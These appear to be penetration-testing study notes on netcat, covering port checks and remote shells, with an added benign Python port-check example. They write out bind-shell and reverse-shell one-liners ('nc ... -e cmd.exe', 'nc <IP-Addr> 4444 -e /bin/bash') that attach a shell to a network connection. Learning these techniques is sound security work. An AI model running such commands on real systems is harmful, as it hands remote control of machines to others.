
Practical Tools

Netcat

# check if a port is open (-n: no DNS lookup, -v: verbose so nc reports the result)
nc -n -v 10.11.0.22 110
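What the command above actually does is a plain TCP connect followed by printing whatever the service says first (on port 110 that is the POP3 greeting). The following Python is an added example, not part of these notes, that reproduces that check and classifies the outcome the way a verbose nc run would be read: "open" (connection accepted), "closed" (connection refused) or "filtered" (no answer before the timeout). The listener, its port and the "+OK POP3" banner are constructed locally so the example runs offline; the 10.11.0.22 host from the notes is not contacted.

```python
import socket
import threading

# Constructed greeting standing in for what a real POP3 service on port 110
# might send; it is served by the local test listener below, not by any real host.
FAKE_BANNER = b"+OK POP3 test server ready\r\n"


def check_port(host: str, port: int, timeout: float = 3.0) -> tuple[str, bytes]:
    """Mimic `nc -n -v host port`: attempt a TCP connect and classify the result.

    Returns (state, banner). state is "open" (connect succeeded), "closed"
    (the peer answered with a reset, i.e. connection refused) or "filtered"
    (no answer before the timeout, or another network error such as no route).
    banner is whatever the service sent unsolicited within the timeout.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except ConnectionRefusedError:
        sock.close()
        return "closed", b""
    except OSError:  # timeout, host unreachable, etc.
        sock.close()
        return "filtered", b""
    try:
        banner = sock.recv(1024)  # many services greet first; read that greeting
    except socket.timeout:
        banner = b""  # open port, but the service waits for the client to speak
    finally:
        sock.close()
    return "open", banner


def start_test_listener(banner: bytes = FAKE_BANNER) -> tuple[socket.socket, int]:
    """Start a throwaway listener on 127.0.0.1 (ephemeral port) that greets one client."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve() -> None:
        try:
            conn, _ = srv.accept()
        except OSError:
            return  # listener was closed before anyone connected
        with conn:
            conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def demo() -> tuple[str, bytes, str]:
    """Probe a listening port (expect open + banner), close it, probe again (expect closed)."""
    srv, port = start_test_listener()
    state_open, banner = check_port("127.0.0.1", port, timeout=2.0)
    srv.close()
    state_closed, _ = check_port("127.0.0.1", port, timeout=2.0)
    return state_open, banner, state_closed


if __name__ == "__main__":
    print(demo())
```

The "closed" versus "filtered" split is the useful part: nc reports the same distinction through its error message (connection refused versus a hang until timeout), and it tells you whether a host is up and simply not listening, or whether something in between is dropping the packets.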

Remote Administration With Netcat

Consider this scenario: two people, A and B, each have a computer. A has a public IP address and is directly connected to the internet (like a server); B is not (like a client) and has only an internal IP address.


Suppose A has a Windows machine and B has a Linux machine (demonstration only; the commands are exactly the same on either side).

Suppose A's public IP address is <IP-Addr>.

The -e option of netcat, in the words of its own help text: "program to exec after connect [dangerous!!]". Whatever program is named is attached to the socket, so whoever is on the other end of the connection drives it.

Netcat Bind Shell Scenario

A exposes its shell to B and lets B control A's computer: A listens (binds cmd.exe to a port) and B connects in.

# A
nc -nlvp 4444 -e cmd.exe # Listening on port 4444, run cmd.exe after connection
# B
nc -nv <IP-Addr> 4444 # B then gets the shell/cmd of A

Reverse Shell Scenario

It's called a reverse shell because the direction is reversed: this time B connects out to A and hands A its shell. A only needs to listen, which is why it works even though B has no public IP address.

# A
nc -nlvp 4444 # Listening on port 4444
# B
nc -nv <IP-Addr> 4444 -e /bin/bash # connect out to A and attach /bin/bash to the connection